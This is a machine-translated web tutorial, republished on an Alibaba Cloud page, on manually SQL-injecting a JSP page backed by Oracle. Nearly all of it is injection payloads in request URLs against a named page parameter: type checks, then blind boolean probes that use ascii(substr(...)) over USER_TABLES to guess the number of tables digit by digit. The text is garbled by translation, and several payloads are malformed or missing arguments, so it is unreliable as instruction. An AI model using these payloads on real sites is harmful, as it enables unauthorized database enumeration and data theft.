Code for manual injection of JSP

Source: Internet
Author: User
Tags manual numeric table name


1. Determine the injection type (numeric or numeric)

Typical and digital data judgment: (I hope someone can further refine the judgment, which is divided into two parts: digital and numeric)

/Index_kaoyan_view.jsp? Id = 117 And user> char (0)
/Index_kaoyan_view.jsp? Id = 117 And user
/Index_kaoyan_view.jsp? Id = 117 And user> char (0) And 1 = 1
/Index_kaoyan_view.jsp? Id = 117 And userchar (0) And % 25 =
/Index_kaoyan_view.jsp? Id = 117 And userchar (0) And () = (
/Index_kaoyan_view.jsp? (Id = 117) And user/index_kaoyan_view.jsp? Id = 117 And str (98)> str (97)
/Index_kaoyan_view.jsp? Id = 117 And str (98)
/Index_kaoyan_view.jsp? Id = 117 And str (98)> str (97) And 1 = 1
/Index_kaoyan_view.jsp? Id = 117 And str (98) str (97) And % 25 =
/Index_kaoyan_view.jsp? Id = 117 And user
/Index_kaoyan_view.jsp? Id = 117 And str (98) str (97) And () = (
/Index_kaoyan_view.jsp? Id = 117 () And str (98)
A normal page appears:
/Index_kaoyan_view.jsp? Id = 117 And USER> CHR (0)
/Index_kaoyan_view.jsp? Id = 117 And USER
 
2. Number of tables to be guessed and table name
The number of databases is 3:
/Index_kaoyan_view.jsp? Id = 117 ">
/Index_kaoyan_view.jsp? Id = 117 And 0 <= nvl (length (select count (*) FROM USER_TABLES), 0)
/Index_kaoyan_view.jsp? Id = 117 And 1> = nvl (length (select count (*) FROM USER_TABLES), 0)
/Index_kaoyan_view.jsp? Id = 117 And 2 <= nvl (length (select count (*) FROM USER_TABLES), 0)
/Index_kaoyan_view.jsp? Id = 117 And 4> = nvl (length (select count (*) FROM USER_TABLES), 0)
/Index_kaoyan_view.jsp? And id = 117
3 = nvl (length (select count (*) FROM USER_TABLES), 0)
/Index_kaoyan_view.jsp? Id = 117 And UNISTR (1)> UNISTR (0)
 
Number of data tables to be guessed
Data table first: 1
/Index_kaoyan_view.jsp? Id = 117 And 52 = ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 52> ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 49 = ascii (substr (select count (*) FROM USER_TABLES ))
 
The second digit of the data table is 3.
/Index_kaoyan_view.jsp? Id = 117 And 49 = ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 95 = ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 77 = ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 77> ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 70 = ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 70> ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 67 = ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 67> ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 65 = ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 65> ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 109 = ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 109> ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 102 = ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 102> ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 99 = ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 99> ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 97 = ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 97> ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 53 = ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 53> ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 51 = ascii (substr (select count (*) FROM USER_TABLES ))
 
The third digit of the data table is: 1.

/Index_kaoyan_view.jsp? Id = 117 And 51 = ascii (substr (select count (*) FROM USER_TABLES ))
/Index_kaoyan_view.jsp? Id = 117 And 95 = ascii (substr (select count (*) FROM USER_TABLES), 3,1 ))

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.